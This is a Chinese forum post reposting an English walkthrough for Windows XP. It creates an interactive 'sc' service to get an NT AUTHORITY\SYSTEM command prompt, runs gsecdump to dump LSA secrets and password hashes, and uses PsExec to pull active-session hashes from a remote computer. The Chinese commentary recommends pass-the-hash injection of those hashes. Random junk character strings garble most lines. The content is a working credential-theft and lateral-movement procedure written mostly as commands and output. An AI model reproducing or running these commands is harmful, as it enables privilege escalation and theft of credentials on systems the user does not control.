o get a DOS Prompt as NT system:) ~1 y+ P0 a c/ i3 V5 L7 P
8 y {3 x1 M7 r; [" X4 F" C. N
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact/ H" R s2 l" w/ z3 Z# F' [
[SC] CreateService SUCCESS
& w0 ?: m W6 b% O, C1 ^8 b
, ]6 M( f! X( J* XC:\>sc start shellcmdline
) I' {6 S0 C1 e" Q[SC] StartService FAILED 1053:
: I1 _& y9 N! U- B. X/ \9 K4 `% \
. H" @# `4 X1 n, IThe service did not respond to the start or control request in a timely fashion.
7 O, q# S" r# n; S: v" x! Y; q s( ^. @7 |
C:\>sc delete shellcmdline
v/ Y7 T2 V! N[SC] DeleteService SUCCESS0 M/ z m) v3 i& X. m
1 [& T$ k7 V+ c/ A* q4 D------------
, Z- J V/ l& V
9 B5 g z- \- C; `# dThen in the new DOS window:
- Z5 R2 u5 }2 w+ o/ y4 {7 t0 I
* k. t& W0 |4 G3 {# ]: {Microsoft Windows XP [Version 5.1.2600]
, S! ~% d$ L8 ?( Y' ^+ ~5 I: M(C) Copyright 1985-2001 Microsoft Corp.
: m) @7 e( n" z# _ j9 `" d$ X$ f6 Z. G% }1 q
C:\WINDOWS\system32>whoami
/ f. O9 V+ n1 T1 G2 MNT AUTHORITY\SYSTEM' w4 ^' C9 H( r* X! e
/ l) @1 P: ?4 p" o7 nC:\WINDOWS\system32>gsecdump -h2 G3 E [3 I! H I% Q$ `
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
5 g; a( o2 T& Eusage: gsecdump [options]1 L; p; `, L6 T3 g: Y2 L, g: G5 Y
' U, k: { t/ j( `( ]' X( Q! ^options:
# i1 n3 q. p+ h, C$ V: l-h [ --help ] show help
8 G" S/ @" i8 @3 H, C4 O8 ~-a [ --dump_all ] dump all secrets: N; p! l& C4 l5 ^
-l [ --dump_lsa ] dump lsa secrets
/ n3 x' i; A: |. _' D P-w [ --dump_wireless ] dump microsoft wireless connections
) u Y! y# F& m: j1 m+ W-u [ --dump_usedhashes ] dump hashes from active logon sessions
6 N3 ?) @% w; U6 F1 t6 O/ t) }& t) f-s [ --dump_hashes ] dump hashes from SAM/AD5 P2 g2 ^1 ^" U2 d
. ^5 @6 ?2 ^. l: R6 m6 bAlthough I like to use:* W3 g. x" t. \- I N/ r/ [
, q. _$ A% @: b2 [5 G
PsExec v1.83 - Execute processes remotely
$ c6 \% }" S+ ]4 ~& X3 qCopyright (C) 2001-2007 Mark Russinovich
; f! y5 l6 G( v5 z( b e. lSysinternals - 链接标记[url]www.sysinternals.com[/url]) X6 M4 h7 w: g* E. @2 o7 y2 {
$ \* F8 A1 s! X# l
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT. L7 _8 _) N5 k" [; H
4 h) ?" I* A+ w: ] O+ j$ D) v% y5 B. [
to get the hashes from active logon sessions of a remote system.
) u& k b8 [4 D* D* E* R7 ]1 f' d5 r+ v* M+ z: S
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables. V @% M9 Q+ I, m: f/ X* x
4 y6 m' D2 o$ w提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
& l6 K' f( ]& K) J原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
3 ^6 ?' M" U! O9 ~9 p5 P5 H4 a* o6 h7 `/ B
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
~& ]4 e0 i% ]' Z |
发表于 2012-11-6 21:09:29
收藏
支持
反对